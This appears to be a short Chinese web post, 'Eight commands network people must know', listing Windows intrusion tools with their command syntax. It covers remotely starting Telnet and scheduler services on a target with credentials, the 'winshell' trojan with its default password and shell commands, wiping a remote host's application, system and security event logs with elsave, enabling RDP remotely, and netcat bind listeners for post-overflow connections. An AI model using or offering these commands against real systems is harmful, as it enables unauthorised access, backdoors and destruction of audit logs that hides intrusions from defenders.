网络人员必须知道的八条命令
一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc/list地址
netsvcschedule地址/query
netsvc地址schedule/start
二、OpenTelnet.exe
远程启动主机的Telnet服务,并绑定端口到7878,例如:
OpenTelnet地址用户名密码17878
然后就可以telnet到主机的7878端口,进入DOS方式下:
telnetIP地址7878
三、winshell.exe
一个非常小的木马,telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
pPath
breBoot
dshutDown
sShell
xeXit
CMD>
四、3389登陆器,GUI方式登录远程主机的
五、elsave.exe
事件日志清除工具
elsave-s地址-l\"application\"-C
elsave-s地址-l\"system\"-C
elsave-s地址-l\"security\"-C
执行后成功清除应用程序日志,系统日志,安全日志
六、hbulot.exe
开启win2kserver和winxp的3389服务
hbulot[/r]
使用/r表示安装完成后自动重起目标使设置生效。
七、nc.exe
一个很好的工具,一些脚本程序都要用到它开发者_Go百科,也可做溢出后的连接用。
想要连接到某处:nc[-options]hostnameport[s][ports]...
绑定端口等待连接:nc-l-pport[-options][hostname][port]
精彩评论